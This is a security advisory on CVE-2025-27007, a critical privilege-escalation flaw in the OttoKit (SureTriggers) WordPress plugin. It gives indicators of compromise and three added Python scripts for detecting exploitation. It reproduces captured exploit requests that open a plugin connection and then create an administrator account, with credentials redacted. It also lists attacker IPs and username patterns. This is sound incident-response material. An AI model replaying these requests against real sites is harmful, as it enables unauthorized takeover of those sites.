On May 2nd, 2025 the Wordfence Threat Intelligence team added a new critical vulnerability to the Wordfence Intelligence vulnerability database in the OttoKit: All-in-One Automation Platform (Formerly SureTriggers) plugin, which was publicly disclosed by a third-party CNA on April 30th, 2025. This vulnerability makes it possible for unauthenticated attackers to gain administrative-level access to vulnerable sites that have never used an application password and have never been connected to SureTriggers, and for authenticated attackers holding a valid application password to do the same.
Special props to Denver Jackson for discovering and responsibly reporting this vulnerability.
Our records indicate that attackers may have started actively exploiting this vulnerability as early as May 2nd, 2025: we have at least one blocked request from that day that appears malicious. Mass exploitation started on May 4th, 2025. The Wordfence Firewall has already blocked over 2,400 exploit attempts targeting this vulnerability.
All Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against any exploits targeting this vulnerability on May 2nd, 2025. Sites using the free version of Wordfence will receive the same protection 30 days later on June 1st, 2025.
The developer of OttoKit: All-in-One Automation Platform (Formerly SureTriggers) worked with the WordPress.org team to perform a forced update so the majority of sites should already be running the patched version of the plugin, 1.0.83. Please take this time to immediately verify that your site is running the latest patched version and update it without delay if it is not, as this vulnerability is under active exploitation.
The Vulnerability Details
Affected Plugin: OttoKit: All-in-One Automation Platform (Formerly SureTriggers)
Plugin Slug: suretriggers
Affected Versions: <= 1.0.82
CVE ID: CVE-2025-27007
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Denver Jackson
Fully Patched Version: 1.0.83
The OttoKit: All-in-One Automation Platform (Formerly SureTriggers) plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.82. This is due to the create_wp_connection() function missing a capability check and insufficiently verifying a user’s authentication credentials. This makes it possible for unauthenticated attackers to establish a connection, which can ultimately be used to escalate privileges.
Additional Note: In our review, we found that this can only be exploited in two scenarios. The first is when a site has never enabled or used an application password, and SureTriggers has never been connected to the website before. A successful connection requires an application password, so anyone who has already connected to SureTriggers should already be protected from the unauthenticated attack scenario. In this scenario, an attacker should be able to exploit the vulnerability without knowing a valid username. The second scenario is when an attacker already has authenticated access to a site and can generate a valid application password.
Indicators of Compromise
The following highlights the most common indicators of compromise. Currently, it appears that attackers are exploiting the initial connection vulnerability to establish a connection with the site, and then using that connection to create an administrative user account through the automation/action endpoint.
It appears threat actors are doing this while also attempting to exploit CVE-2025-3102, leading us to believe that they are trying both recently disclosed vulnerabilities to see whether a site is vulnerable to either. Exploit attempts targeting CVE-2025-3102 can be distinguished from those targeting CVE-2025-27007 by the presence of an empty `St-Authorization` header in the CVE-2025-3102 attempts.
Example Initial Request
POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Host: [redacted]
Referer: www.google.com
User-Agent: OttoKit
Cache-Control: max-age=0
X-Forwarded-For: 144.91.119.115
Upgrade-Insecure-Requests: 1
Cf-Ray: 93ac255d5d18e98c-FRA
Cf-Visitor: {"scheme":"https"}
X-Forwarded-Proto: https
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 144.91.119.115
Cf-Ipcountry: FR
Content-Type: application/json
Content-Length: 17

{"sure-triggers-access-key": "[redacted]", "wp-password": "[redacted]", "connection_status": "ok", "wp-username": "wp_owsr", "connected_email": "[redacted]"}
Example Admin Creation Request
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Host: [redacted]
Referer: www.google.com
User-Agent: OttoKit
Cache-Control: max-age=0
X-Forwarded-For: 144.91.119.115
St-Authorization: [redacted]
Upgrade-Insecure-Requests: 1
Cf-Ray: 93ac25620c2ed36e-FRA
Cf-Visitor: {"scheme":"https"}
X-Forwarded-Proto: https
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 144.91.119.115
Cf-Ipcountry: FR
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

selected_options[user_name]=wp_domc&selected_options[user_email]=[redacted]&selected_options[password]=[redacted]&selected_options[role]=administrator&integration=WordPress&type_event=create_user_if_not_exists
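The two captures above, plus the `St-Authorization` tell described earlier, are enough to triage a captured request automatically. The following is an added example, not Wordfence or OttoKit code: it parses a raw HTTP/1.1 request, resolves both the `/wp-json/...` and `?rest_route=...` forms of the two SureTriggers routes, attributes `automation/action` requests to CVE-2025-3102 (empty `St-Authorization`) or to the CVE-2025-27007 follow-up (non-empty `St-Authorization`), and pulls out the username the attacker is trying to create. The sample requests are constructed to match the shape of the captures; the addresses, hostnames and REDACTED values are placeholders.

```python
import json
import re
from urllib.parse import parse_qs

CONNECT = "connection/create-wp-connection"
ACTION = "automation/action"
# Both URL forms seen in the wild carry this substring once the rest_route value is decoded.
ROUTE_RE = re.compile(r"sure-triggers/v1/(connection/create-wp-connection|automation/action)")


def sure_triggers_route(target):
    """Return the SureTriggers route a request target addresses, or None.

    Handles /wp-json/sure-triggers/v1/<route> and ?rest_route=[/]sure-triggers/v1/<route>.
    """
    path, _, query = target.partition("?")
    m = ROUTE_RE.search(path)
    if not m:
        rest_route = parse_qs(query).get("rest_route", [""])[0]
        m = ROUTE_RE.search(rest_route)
    return m.group(1) if m else None


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, lowercase header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify(raw):
    """Attribute a captured request to CVE-2025-27007 or CVE-2025-3102 activity."""
    method, target, headers, body = parse_request(raw)
    route = sure_triggers_route(target)
    result = {
        "route": route,
        # Behind Cloudflare the real client sits in Cf-Connecting-Ip, as in the captures.
        "src_ip": headers.get("cf-connecting-ip") or headers.get("x-forwarded-for"),
    }
    if route is None:
        result["verdict"] = "not a SureTriggers request"
    elif route == CONNECT:
        result["verdict"] = "CVE-2025-27007: unauthenticated connection attempt"
        try:
            result["wp_username"] = json.loads(body).get("wp-username")
        except ValueError:
            result["wp_username"] = None
    else:
        st_auth = headers.get("st-authorization")
        if st_auth == "":
            # An empty St-Authorization header is the tell for CVE-2025-3102 attempts.
            result["verdict"] = "CVE-2025-3102: automation/action with empty St-Authorization"
        elif st_auth:
            result["verdict"] = "CVE-2025-27007 follow-up: admin creation with connection key"
        else:
            result["verdict"] = "automation/action without St-Authorization header"
        opts = parse_qs(body)
        result["new_user"] = opts.get("selected_options[user_name]", [None])[0]
        result["new_role"] = opts.get("selected_options[role]", [None])[0]
    return result


# Constructed samples modelled on the captured requests; placeholders, not real attacker data.
SAMPLE_CONNECT = (
    "POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1\r\n"
    "Host: example.test\r\nUser-Agent: OttoKit\r\nCf-Connecting-Ip: 203.0.113.10\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"sure-triggers-access-key": "REDACTED", "wp-password": "REDACTED", '
    '"connection_status": "ok", "wp-username": "wp_owsr", "connected_email": "a@example.test"}'
)
SAMPLE_ADMIN_27007 = (
    "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1\r\n"
    "Host: example.test\r\nUser-Agent: OttoKit\r\nCf-Connecting-Ip: 203.0.113.10\r\n"
    "St-Authorization: REDACTED\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    "selected_options[user_name]=wp_domc&selected_options[user_email]=b%40example.test"
    "&selected_options[password]=REDACTED&selected_options[role]=administrator"
    "&integration=WordPress&type_event=create_user_if_not_exists"
)
SAMPLE_ADMIN_3102 = (
    "POST /index.php?rest_route=/sure-triggers/v1/automation/action HTTP/1.1\r\n"
    "Host: example.test\r\nUser-Agent: OttoKit\r\nCf-Connecting-Ip: 198.51.100.7\r\n"
    "St-Authorization:\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    "selected_options[user_name]=admin_iw0ag5sx&selected_options[role]=administrator"
    "&integration=WordPress&type_event=create_user_if_not_exists"
)

if __name__ == "__main__":
    for raw in (SAMPLE_CONNECT, SAMPLE_ADMIN_27007, SAMPLE_ADMIN_3102):
        print(classify(raw))
```

The classifier keys on the `St-Authorization` header exactly as this post describes it; requests where the header is absent altogether are reported separately rather than attributed to either CVE, since the post does not describe that case.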
Top IPs Targeting CVE-2025-3102 and CVE-2025-27007
The following IP addresses are currently the most active ones targeting the sure-triggers/v1/connection/create-wp-connection endpoint:
- 41.216.188.205
  - Over 870 blocked requests.
- 144.91.119.115
  - Over 690 blocked requests.
- 194.87.29.57
  - Over 500 blocked requests.
- 2a0b:4141:820:1f4::2
  - Over 200 blocked requests.
- 196.251.69.118
  - Over 25 blocked requests.
  - Interestingly, we have also logged over 731,000 requests from this IP probing for ‘/wp-content/plugins/suretriggers/readme.txt’, which indicates that it is likely a reconnaissance IP checking whether the plugin is installed.
The following IP addresses are currently the most active ones targeting the wp-json/sure-triggers/v1/automation/action endpoint, which indicates exploitation of both CVE-2025-3102 and CVE-2025-27007:
- 107.189.29.12
  - Over 139,000 blocked requests.
- 205.185.123.102
  - Over 118,000 blocked requests.
- 198.98.51.24
  - Over 105,000 blocked requests.
- 198.98.52.226
  - Over 64,000 blocked requests.
- 199.195.248.147
  - Over 56,000 blocked requests.
Administrative User Accounts
Keep an eye out for administrative user accounts created with the following username structures.
- Attacks originating from the IPs 144.91.119.115, 41.216.188.205, and 196.251.69.118 attempt to create administrator accounts with the username format ‘wp_’ followed by four random letters, which suggests that these IPs belong to the same threat actor. Here are a few example variants:
  - wp_pfuq
  - wp_rvus
  - wp_uvge
- Attacks originating from the IPs 194.87.29.57 and 2a0b:4141:820:1f4::2 attempt to create 12-character usernames prefixed with `xtw18387`, such as:
  - xtw18387e9db
  - xtw18387becc
  - xtw18387cc91
- Attacks originating from the IPs 107.189.29.12, 199.195.248.147, and 205.185.123.102 attempt to create 14-character administrator usernames: `admin_` followed by eight random alphanumeric characters, for example:
  - admin_iw0ag5sx
  - admin_o1etqaj6
  - admin_7h1vq7d7
- Attacks originating from the IPs 198.98.51.24 and 198.98.52.226 attempt to create 13-character administrator usernames: `test_` followed by eight random alphanumeric characters, for example:
  - test_iajt388i
  - test_z0vrl03m
  - test_24l6eap4
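The four naming schemes above can be turned into a quick sweep of a site's user table. The following is an added example (not Wordfence or OttoKit code) that reads a user export in the shape produced by `wp user list --format=json`, keeps only administrator accounts, and flags logins matching any of the schemes, marking those registered on or after May 2nd, 2025, the earliest exploitation date reported here. The character classes in the regular expressions generalise the listed examples and are an assumption; the sample export is constructed.

```python
import json
import re
from datetime import datetime

# Username shapes reported in this post. The character classes generalise the
# listed examples and are an assumption, not a rule taken from attacker tooling.
SUSPICIOUS_LOGIN_PATTERNS = {
    "wp_ + 4 random letters": re.compile(r"^wp_[a-z]{4}$"),
    "xtw18387 + 4 chars": re.compile(r"^xtw18387[a-z0-9]{4}$"),
    "admin_ + 8 alphanumerics": re.compile(r"^admin_[a-z0-9]{8}$"),
    "test_ + 8 alphanumerics": re.compile(r"^test_[a-z0-9]{8}$"),
}
# Earliest exploitation date given in the post.
EXPLOITATION_START = datetime(2025, 5, 2)

# Constructed sample in the shape of `wp user list --format=json` output.
SAMPLE_USER_EXPORT = json.dumps([
    {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.test",
     "user_registered": "2021-03-01 09:00:00", "roles": "administrator"},
    {"ID": 7, "user_login": "wp_pfuq", "user_email": "x@example.test",
     "user_registered": "2025-05-04 03:12:41", "roles": "administrator"},
    {"ID": 8, "user_login": "xtw18387e9db", "user_email": "y@example.test",
     "user_registered": "2025-05-05 11:40:02", "roles": "administrator"},
    {"ID": 9, "user_login": "test_iajt388i", "user_email": "z@example.test",
     "user_registered": "2025-05-05 12:00:00", "roles": "subscriber"},
    {"ID": 10, "user_login": "admin_iw0ag5sx", "user_email": "w@example.test",
     "user_registered": "2024-01-10 08:00:00", "roles": "administrator"},
])


def suspicious_admins(user_export_json, since=EXPLOITATION_START):
    """Flag administrator accounts whose login matches a known attacker naming scheme."""
    hits = []
    for user in json.loads(user_export_json):
        roles = user.get("roles", "")
        if isinstance(roles, str):          # wp-cli emits a comma-separated string
            roles = roles.split(",")
        if "administrator" not in roles:
            continue
        registered = datetime.strptime(user["user_registered"], "%Y-%m-%d %H:%M:%S")
        for label, pattern in SUSPICIOUS_LOGIN_PATTERNS.items():
            if pattern.match(user["user_login"]):
                hits.append({
                    "login": user["user_login"],
                    "pattern": label,
                    "registered": user["user_registered"],
                    # Registered after exploitation began: treat as a probable injected account.
                    "registered_since_exploitation": registered >= since,
                })
                break
    return hits


if __name__ == "__main__":
    for hit in suspicious_admins(SAMPLE_USER_EXPORT):
        print(hit)
```

Pipe in `wp user list --format=json` from the site's WP-CLI to run this against real data. The role filter mirrors the post's focus on administrator accounts; drop it to surface lower-privilege accounts with the same naming scheme. A pattern match on an account registered before May 2nd, 2025 (the `admin_iw0ag5sx` sample) is still worth a manual look but is not by itself evidence of this campaign.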
Access Log Traffic
Requests to the following REST API endpoints may appear in your access logs, in either the pretty-permalink or the rest_route form:
- /wp-json/sure-triggers/v1/connection/create-wp-connection
- ?rest_route=sure-triggers/v1/connection/create-wp-connection
After successfully exploiting the /connection/create-wp-connection endpoint, attackers attempt to create administrative user accounts through the following endpoints. Requests to these endpoints can also indicate that attackers are targeting CVE-2025-3102.
- /wp-json/sure-triggers/v1/automation/action
- ?rest_route=sure-triggers/v1/automation/action
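The endpoint list above maps directly onto an access-log sweep. The following is an added example, not Wordfence or OttoKit code: it reads combined-format (Apache/Nginx) log lines, percent-decodes the request target so that both the `/wp-json/...` and `?rest_route=...` forms match, tallies hits per source IP for each endpoint, counts `readme.txt` reconnaissance probes separately, and reports IPs that received a 2xx on create-wp-connection followed by a 2xx on automation/action, which is the attack chain described in this post. The log lines are constructed and use documentation address ranges rather than the IOC IPs.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

CONNECT = "connection/create-wp-connection"
ACTION = "automation/action"
# Matches either URL form once the target is percent-decoded:
# /wp-json/sure-triggers/v1/<route> and ?rest_route=[/]sure-triggers/v1/<route>
ROUTE_RE = re.compile(r"sure-triggers/v1/(connection/create-wp-connection|automation/action)")
README_PROBE = "/wp-content/plugins/suretriggers/readme.txt"
# Combined log format; the first field is whatever the web server logs as the client IP.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (documentation address ranges, not the IOC IPs).
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [04/May/2025:03:12:41 +0000] "POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1" 200 145 "www.google.com" "OttoKit"
203.0.113.10 - - [04/May/2025:03:12:43 +0000] "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1" 200 98 "www.google.com" "OttoKit"
198.51.100.7 - - [04/May/2025:03:15:02 +0000] "GET /wp-content/plugins/suretriggers/readme.txt HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
198.51.100.7 - - [04/May/2025:03:15:09 +0000] "POST /index.php?rest_route=/sure-triggers/v1/automation/action HTTP/1.1" 403 0 "-" "OttoKit"
192.0.2.44 - - [04/May/2025:03:20:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [04/May/2025:03:21:00 +0000] "POST /?rest_route=%2Fsure-triggers%2Fv1%2Fconnection%2Fcreate-wp-connection HTTP/1.1" 200 145 "-" "OttoKit"
"""


def scan_access_log(text):
    """Tally SureTriggers endpoint hits per IP and spot the connect-then-create chain."""
    by_ip = defaultdict(Counter)   # ip -> Counter({route: hits})
    readme_probes = Counter()      # ip -> readme.txt reconnaissance requests
    connected = set()              # ips that got a 2xx on create-wp-connection
    chain_hits = set()             # ips that afterwards got a 2xx on automation/action
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, status = m.group("ip"), int(m.group("status"))
        target = unquote(m.group("target"))
        if target.split("?", 1)[0] == README_PROBE:
            readme_probes[ip] += 1
            continue
        route_match = ROUTE_RE.search(target)
        if not route_match:
            continue
        route = route_match.group(1)
        by_ip[ip][route] += 1
        if 200 <= status < 300:
            if route == CONNECT:
                connected.add(ip)
            elif ip in connected:
                chain_hits.add(ip)
    return {"by_ip": by_ip, "readme_probes": readme_probes, "chain_hits": chain_hits}


def top_ips(by_ip, route, n=5):
    """Most active IPs for one route, in the shape of the lists in this post."""
    return Counter({ip: c[route] for ip, c in by_ip.items() if c[route]}).most_common(n)


if __name__ == "__main__":
    report = scan_access_log(SAMPLE_ACCESS_LOG)
    print("create-wp-connection:", top_ips(report["by_ip"], CONNECT))
    print("automation/action:", top_ips(report["by_ip"], ACTION))
    print("readme.txt probes:", report["readme_probes"].most_common())
    print("connect-then-create chain from:", sorted(report["chain_hits"]))
```

Two caveats when running this on a real log. If the site sits behind Cloudflare or another proxy, the first log field is the edge address unless the web server is configured to log the forwarded client address (the captures above carry it in `Cf-Connecting-Ip`). And a 2xx on automation/action only shows the request was accepted, not that an account was created; confirm against the users table.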
Conclusion
In today’s article, we covered the attack data for a critical-severity vulnerability in OttoKit: All-in-One Automation Platform (Formerly SureTriggers) that allows attackers to easily take over websites by establishing a connection with OttoKit: All-in-One Automation Platform (Formerly SureTriggers) and then creating an administrative user account. Our threat intelligence indicates that attackers may have started actively targeting this vulnerability as early as May 2nd, 2025, with mass exploitation starting on May 4th, 2025. The Wordfence firewall has already blocked over 2,400 exploit attempts targeting this vulnerability.
All Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against any exploits targeting this vulnerability on May 2nd, 2025. Sites using the free version of Wordfence will receive the same protection 30 days later on June 1st, 2025.
The developer of OttoKit: All-in-One Automation Platform (Formerly SureTriggers) worked with the WordPress.org team to perform a forced update so most sites should be running the patched version of the plugin, 1.0.83. Regardless, we strongly recommend verifying that your site is running the latest patched version, or take action immediately to update.
If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.